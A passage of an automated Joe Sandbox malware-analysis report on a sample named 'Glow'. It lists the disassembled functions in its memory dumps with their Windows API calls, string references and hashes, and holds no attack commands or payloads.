SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 003E564E
_wcslen.LIBCMT ref: 003E566C
CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 003E5674
_wcsstr.LIBVCRUNTIME ref: 003E567E

Memory Dump Source

Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true

Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_380000_Glow.jbxd

Similarity

API ID: MessageSend$BuffCharUpperVisibleWindow_wcslen_wcsstr
String ID:
API String ID: 72514467-0
Opcode ID: ef09d21bbc910094aec52a044cec3a0ffc85dd3bd1b02bb0844334c7ba546c22
Instruction ID: 0644a868963c93e52c16f057435b8ed3442e7d70ea422592a24e39147c51e9c3
Opcode Fuzzy Hash: ef09d21bbc910094aec52a044cec3a0ffc85dd3bd1b02bb0844334c7ba546c22
Instruction Fuzzy Hash: 2E2123726046507BEB175B3ADC49EBB7BACDF46764F148139F809CE1D1EBA4CC418660

Function 003F6263 Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 336comCOMMON

Download Yara Rule

APIs

Part of subcall function 00385851: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,003855D1,?,?,003C4B76,?,?,00000100,00000000,00000000,CMDLINE), ref: 00385871

_wcslen.LIBCMT ref: 003F62C0
CoInitialize.OLE32(00000000), ref: 003F63DA
CoCreateInstance.OLE32(00420CC4,00000000,00000001,00420B34,?), ref: 003F63F3
CoUninitialize.OLE32 ref: 003F6411

Strings

.lnk, xrefs: 003F62BB, 003F6306, 003F63CA

Memory Dump Source

Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true

Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_380000_Glow.jbxd

Similarity

API ID: CreateFullInitializeInstanceNamePathUninitialize_wcslen
String ID: .lnk
API String ID: 3172280962-24824748
Opcode ID: eff653d1d48088c2cf8eefd7fe62d0de09a6df2c033d5f4bcfe590573ee1f1b6
Instruction ID: 5b5ece1990ceada2b8e2d032cafb9e147848b41e4d61124f307a19ecfd438d20
Opcode Fuzzy Hash: eff653d1d48088c2cf8eefd7fe62d0de09a6df2c033d5f4bcfe590573ee1f1b6
Instruction Fuzzy Hash: 55D15374A043059FC716EF24C481A2ABBE5FF89714F11889DF9899B361CB31EC05CB92

Function 003A36F2 Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,003A36E9,003A3355), ref: 003A3700
___vcrt_FlsGetValue.LIBVCRUNTIME ref: 003A370E
___vcrt_FlsSetValue.LIBVCRUNTIME ref: 003A3727
SetLastError.KERNEL32(00000000,?,003A36E9,003A3355), ref: 003A3779

Memory Dump Source

Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true

Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_380000_Glow.jbxd

Similarity

API ID: ErrorLastValue___vcrt_
String ID:
API String ID: 3852720340-0
Opcode ID: ac5b93ea6d3eb92d1c879c6a98baf8b2d00318c050488b6f0f51df4ff1410d62
Instruction ID: 704b7f284358609e6530205e773a7852315be96b5192bb5e1e99a0cb2b340a01
Opcode Fuzzy Hash: ac5b93ea6d3eb92d1c879c6a98baf8b2d00318c050488b6f0f51df4ff1410d62
Instruction Fuzzy Hash: FD01F7F6A5E3216EA72B2BB4BCC6A676B94EB077797200339F5204A0F0EF524D025244

Function 003B30E7 Relevance: 9.0, APIs: 6, Instructions: 50COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,00000000,003A4D53,00000000,?,?,003A68E2,?,?,00000000), ref: 003B30EB
_free.LIBCMT ref: 003B311E
_free.LIBCMT ref: 003B3146
SetLastError.KERNEL32(00000000,?,00000000), ref: 003B3153
SetLastError.KERNEL32(00000000,?,00000000), ref: 003B315F
_abort.LIBCMT ref: 003B3165

Memory Dump Source

Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true

Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_380000_Glow.jbxd

Similarity

API ID: ErrorLast$_free$_abort
String ID:
API String ID: 3160817290-0
Opcode ID: bc09b3e176ad03a251391dd270d3d9790ed0e56489da9214fe389891d6859506
Instruction ID: 90493ae317e3d98b46bf15a34f70ea0489210e2d6f0244dfbe1c0ec2bf9ecb8b
Opcode Fuzzy Hash: bc09b3e176ad03a251391dd270d3d9790ed0e56489da9214fe389891d6859506
Instruction Fuzzy Hash: 4CF0F975A0452026C213773DAC06EEF166D9FC577DB220525FF3496AD2EE248A024165

Function 00419480 Relevance: 9.0, APIs: 6, Instructions: 49COMMON

Download Yara Rule

APIs

Part of subcall function 00381F2D: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00381F87
Part of subcall function 00381F2D: SelectObject.GDI32(?,00000000), ref: 00381F96
Part of subcall function 00381F2D: BeginPath.GDI32(?), ref: 00381FAD
Part of subcall function 00381F2D: SelectObject.GDI32(?,00000000), ref: 00381FD6

MoveToEx.GDI32(?,-00000002,00000000,00000000), ref: 004194AA
LineTo.GDI32(?,00000003,00000000), ref: 004194BE
MoveToEx.GDI32(?,00000000,-00000002,00000000), ref: 004194CC
LineTo.GDI32(?,00000000,00000003), ref: 004194DC
EndPath.GDI32(?), ref: 004194EC
StrokePath.GDI32(?), ref: 004194FC

Memory Dump Source

Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true

Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_380000_Glow.jbxd

Similarity

API ID: Path$LineMoveObjectSelect$BeginCreateStroke
String ID:
API String ID: 43455801-0
Opcode ID: 0c364bd6842bc7982c64a3c3cb126c3a573cb5fd4c918b2bfb3dd24aac932377
Instruction ID: 1ef790662625df75fa9618aa96f6257f7876ba2b4c6c96fc524a0bd12afeda67
Opcode Fuzzy Hash: 0c364bd6842bc7982c64a3c3cb126c3a573cb5fd4c918b2bfb3dd24aac932377
Instruction Fuzzy Hash: A7111BB650010DBFDF029F90DC88EDA7F6DEB08364F04C062FA195A161C771AD55DBA4

Function 003E5B61 Relevance: 9.0, APIs: 6, Instructions: 49COMMON

Download Yara Rule

APIs

GetDC.USER32(00000000), ref: 003E5B7C
GetDeviceCaps.GDI32(00000000,00000058), ref: 003E5B8D
GetDeviceCaps.GDI32(00000000,0000005A), ref: 003E5B94
ReleaseDC.USER32(00000000,00000000), ref: 003E5B9C
MulDiv.KERNEL32(000009EC,?,00000000), ref: 003E5BB3
MulDiv.KERNEL32(000009EC,00000001,?), ref: 003E5BC5

Memory Dump Source

Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true

Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_380000_Glow.jbxd

Similarity

API ID: CapsDevice$Release
String ID:
API String ID: 1035833867-0
Opcode ID: c25a407e49f88eaa0ce823eb0d6f286930f2122b2d50c540be4322f09ba3de1d
Instruction ID: c4d403a2438a3a228a7d1b8d9c4349372156562d21f0d6ee05c7bc3cc12e94e8
Opcode Fuzzy Hash: c25a407e49f88eaa0ce823eb0d6f286930f2122b2d50c540be4322f09ba3de1d
Instruction Fuzzy Hash: 530144B5E00719BBEB119BA69C49F8E7F78EB48751F008075FA09A7280D6709D00CB94

Function 0038327E Relevance: 9.0, APIs: 6, Instructions: 44keyboardCOMMON

Download Yara Rule

APIs

MapVirtualKeyW.USER32(0000005B,00000000), ref: 003832AF
MapVirtualKeyW.USER32(00000010,00000000), ref: 003832B7
MapVirtualKeyW.USER32(000000A0,00000000), ref: 003832C2
MapVirtualKeyW.USER32(000000A1,00000000), ref: 003832CD
MapVirtualKeyW.USER32(00000011,00000000), ref: 003832D5
MapVirtualKeyW.USER32(00000012,00000000), ref: 003832DD

Memory Dump Source

Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true

Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_380000_Glow.jbxd

Similarity

API ID: Virtual
String ID:
API String ID: 4278518827-0
Opcode ID: 9d96f3ee6ccaee086f3915b41e61888cd6b2fbdbf01b018969a8fdcc44a52ff4
Instruction ID: 60df1a5dc96ad1ad56ce535ff21e62d17f3378c62eb54f6fdc2f4cd1dcb95ea6
Opcode Fuzzy Hash: 9d96f3ee6ccaee086f3915b41e61888cd6b2fbdbf01b018969a8fdcc44a52ff4
Instruction Fuzzy Hash: 330167B0902B5ABDE3008F6A8C85B52FFA8FF19354F00411BA15C4BA42C7F5A864CBE5

Function 003EF437 Relevance: 9.0, APIs: 6, Instructions: 42windowtimethreadCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,00000010,00000000,00000000), ref: 003EF447
SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 003EF45D
GetWindowThreadProcessId.USER32(?,?), ref: 003EF46C
OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 003EF47B
TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 003EF485
CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 003EF48C

Memory Dump Source

Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true

Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_380000_Glow.jbxd

Similarity

API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
String ID:
API String ID: 839392675-0
Opcode ID: c303db6e15c11a1f44203540148a450473147697a6b8644be44a2718b35efb8c
Instruction ID: 357209f0a40d062b081a64a33e0524d0e3297d0df6baaa3a506b2c9015824c7c
Opcode Fuzzy Hash: c303db6e15c11a1f44203540148a450473147697a6b8644be44a2718b35efb8c
Instruction Fuzzy Hash: 0CF054B2641158BFE72157529C0EEEF7F7CEFC6B11F004068F611D1190D7A45A01C6B9

Function 003C34D6 Relevance: 9.0, APIs: 6, Instructions: 39windowCOMMON

Download Yara Rule

APIs

GetClientRect.USER32(?), ref: 003C34EF
SendMessageW.USER32(?,00001328,00000000,?), ref: 003C3506
GetWindowDC.USER32(?), ref: 003C3512
GetPixel.GDI32(00000000,?,?), ref: 003C3521
ReleaseDC.USER32(?,00000000), ref: 003C3533
GetSysColor.USER32(00000005), ref: 003C354D

Memory Dump Source

Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true

Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_380000_Glow.jbxd

Similarity

API ID: ClientColorMessagePixelRectReleaseSendWindow
String ID:
API String ID: 272304278-0
Opcode ID: 04d19596a2fbf3f0e0c1a6d9afbbe05444ae5564cab1915a88d3d549fc4ed110
Instruction ID: 43492c5400fde92060b0983e25f304218c56e5bae85560d5379cd59622718934
Opcode Fuzzy Hash: 04d19596a2fbf3f0e0c1a6d9afbbe05444ae5564cab1915a88d3d549fc4ed110
Instruction Fuzzy Hash: B9012471900215FFDB516FA4DC08FEA7BB6FB09321F518174FA2AA21A1CB311E52AB14

Function 003E21C1 Relevance: 9.0, APIs: 6, Instructions: 23memorysynchronizationCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(?,000000FF), ref: 003E21CC
UnloadUserProfile.USERENV(?,?), ref: 003E21D8
CloseHandle.KERNEL32(?), ref: 003E21E1
CloseHandle.KERNEL32(?), ref: 003E21E9
GetProcessHeap.KERNEL32(00000000,?), ref: 003E21F2
HeapFree.KERNEL32(00000000), ref: 003E21F9

Memory Dump Source

Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true

Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_380000_Glow.jbxd

Similarity

API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
String ID:
API String ID: 146765662-0
Opcode ID: cc30a9079b66a6b5add1a83a0bc1397f184291ccfac3a00e11157bcb09b9dccb
Instruction ID: 1396be86fe46366549f41e302f3cdcc42218aefa2fc0a3df24f8833f59415cdf
Opcode Fuzzy Hash: cc30a9079b66a6b5add1a83a0bc1397f184291ccfac3a00e11157bcb09b9dccb
Instruction Fuzzy Hash: 2AE0E5B6804109BBDB012FA1EC0C98AFF39FF49322B108230F625820B0CB329420DB58

Function 0040B7C4 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 176COMMON

Download Yara Rule

APIs

ShellExecuteExW.SHELL32(0000003C), ref: 0040B903

Part of subcall function 003841EA: _wcslen.LIBCMT ref: 003841EF

GetProcessId.KERNEL32(00000000), ref: 0040B998
CloseHandle.KERNEL32(00000000), ref: 0040B9C7

Strings

<, xrefs: 0040B8CB
@, xrefs: 0040B8D2

Memory Dump Source

Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true

Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_380000_Glow.jbxd

Similarity

API ID: CloseExecuteHandleProcessShell_wcslen
String ID: <$@
API String ID: 146682121-1426351568
Opcode ID: 2d1941353be91c23d567c263306c602de6cc9f375b774b9c4dbc14c8320a08f2
Instruction ID: f7d3f5e999fe371e8d68e9574996e23c528d8c0c8b52d381b0df240804a7c335
Opcode Fuzzy Hash: 2d1941353be91c23d567c263306c602de6cc9f375b774b9c4dbc14c8320a08f2
Instruction Fuzzy Hash: 22714A75A00215DFCB15EF54C494A9EBBF5FF08310F0484AAE855AB3A1CB74ED45CB98

Function 003E7B05 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 120comlibraryloaderCOMMON

Download Yara Rule

APIs

CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 003E7B6D
SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 003E7BA3
GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 003E7BB4
SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 003E7C36

Strings

DllGetClassObject, xrefs: 003E7BA9

Memory Dump Source

Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true

Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_380000_Glow.jbxd

Similarity

API ID: ErrorMode$AddressCreateInstanceProc
String ID: DllGetClassObject
API String ID: 753597075-1075368562
Opcode ID: 6f47c2d2bb420da8101059bcfee2fef181b26cafb7694ec544ef0f19f5c5a717
Instruction ID: 278833eb5bed33616dbe2de88fa348de163665dc8a245e78532d3a0fc399cb2f
Opcode Fuzzy Hash: 6f47c2d2bb420da8101059bcfee2fef181b26cafb7694ec544ef0f19f5c5a717
Instruction Fuzzy Hash: E341E3B1604264EFDB16CF65C884A9A7BBDEF44300F2082A9EC069F285D7B0DD40DBA0

Function 00414818 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 101windowCOMMON

Download Yara Rule

APIs

GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 004148D1
IsMenu.USER32(?), ref: 004148E6
InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 0041492E
DrawMenuBar.USER32 ref: 00414941

Strings

0, xrefs: 00414825

Memory Dump Source

Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true

Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_380000_Glow.jbxd

Similarity

API ID: Menu$Item$DrawInfoInsert
String ID: 0
API String ID: 3076010158-4108050209
Opcode ID: a04d2e719388f2e533507372d54b8ba8b2611e390246dda21339f237125ea9a8
Instruction ID: c0428fdc4b6cedce32f97c46adfe6b38935470730f496556e834161a2a55f116
Opcode Fuzzy Hash: a04d2e719388f2e533507372d54b8ba8b2611e390246dda21339f237125ea9a8
Instruction Fuzzy Hash: 9B416AB5A10209EFDB10CF61D984AEBBBB9FF46324F04812AE9459B350C334ED85CB64

Function 003E272F Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 93windowCOMMON

Download Yara Rule

APIs

Part of subcall function 0038B329: _wcslen.LIBCMT ref: 0038B333

Part of subcall function 003E45FD: GetClassNameW.USER32(?,?,000000FF), ref: 003E4620

SendMessageW.USER32(?,00000188,00000000,00000000), ref: 003E27B3
SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 003E27C6
SendMessageW.USER32(?,00000189,?,00000000), ref: 003E27F6

Part of subcall function 00388577: _wcslen.LIBCMT ref: 0038858A

Strings

ComboBox, xrefs: 003E273D
ListBox, xrefs: 003E2772

Memory Dump Source

Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true

Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_380000_Glow.jbxd

Similarity

API ID: MessageSend$_wcslen$ClassName
String ID: ComboBox$ListBox
API String ID: 2081771294-1403004172
Opcode ID: 32f7d42697a5951411a8b448d52cf47537bacca3a537fa8540b976d3ebee23ed
Instruction ID: c870662c2f1b5d21a942019cee55e1bba74bf7d2a3974231cc4a1baddba702df
Opcode Fuzzy Hash: 32f7d42697a5951411a8b448d52cf47537bacca3a537fa8540b976d3ebee23ed
Instruction Fuzzy Hash: C5210776900254BEDB06AB61DC45DFFB7BCDF46360B108229F421AB1E1DB784909D750

Function 004139B3 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 78windowlibraryCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000467,00000000,?), ref: 00413A29
LoadLibraryW.KERNEL32(?), ref: 00413A30
SendMessageW.USER32(?,00000467,00000000,00000000), ref: 00413A45
DestroyWindow.USER32(?), ref: 00413A4D

Strings

SysAnimate32, xrefs: 00413A04

Memory Dump Source

Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true

Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_380000_Glow.jbxd

Similarity

API ID: MessageSend$DestroyLibraryLoadWindow
String ID: SysAnimate32
API String ID: 3529120543-1011021900
Opcode ID: 403de2f6478663454b943190a476cd9e580528e9a23d40c90388d69a8f11c908
Instruction ID: 53d5fda557201252a0bf8d34c916028ce3b34b7323c40346130a8037d7fa440f
Opcode Fuzzy Hash: 403de2f6478663454b943190a476cd9e580528e9a23d40c90388d69a8f11c908
Instruction Fuzzy Hash: 5C21F3B1600205AFEF109F64DC80FFB37A9EF453A5F10522AFA90922D0C375CD819768

Function 00419A25 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 78windowCOMMON

Download Yara Rule

APIs

Part of subcall function 0038249F: GetWindowLongW.USER32(00000000,000000EB), ref: 003824B0

GetCursorPos.USER32(?), ref: 00419A5D
TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 00419A72
GetCursorPos.USER32(?), ref: 00419ABA
DefDlgProcW.USER32(?,0000007B,?,?,?,?), ref: 00419AF0

Strings

(E, xrefs: 00419A30

Memory Dump Source

Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true

Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_380000_Glow.jbxd

Similarity

API ID: Cursor$LongMenuPopupProcTrackWindow
String ID: (E
API String ID: 2864067406-3218771753
Opcode ID: b611920788181f77a177f30778a5e1273389b1a25294cf594541514100e825b3
Instruction ID: e67cf636e41eebe397ea3096118afcedf242e1d6014a6295992b38b0eda1d3ac
Opcode Fuzzy Hash: b611920788181f77a177f30778a5e1273389b1a25294cf594541514100e825b3
Instruction Fuzzy Hash: 6021EF70A00158AFCF258F94C868EEF3BB9EF0A390F444066F9054B2A1C3B99D94DB64

Function 00381AAC Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 56COMMON

Download Yara Rule

APIs

Part of subcall function 0038249F: GetWindowLongW.USER32(00000000,000000EB), ref: 003824B0

DefDlgProcW.USER32(?,00000020,?,00000000), ref: 00381AF4
GetClientRect.USER32(?,?), ref: 003C31F9
GetCursorPos.USER32(?), ref: 003C3203
ScreenToClient.USER32(?,?), ref: 003C320E

Strings

(E, xrefs: 00381AB2

Memory Dump Source

Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true

Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_380000_Glow.jbxd

Similarity

API ID: Client$CursorLongProcRectScreenWindow
String ID: (E
API String ID: 4127811313-3218771753
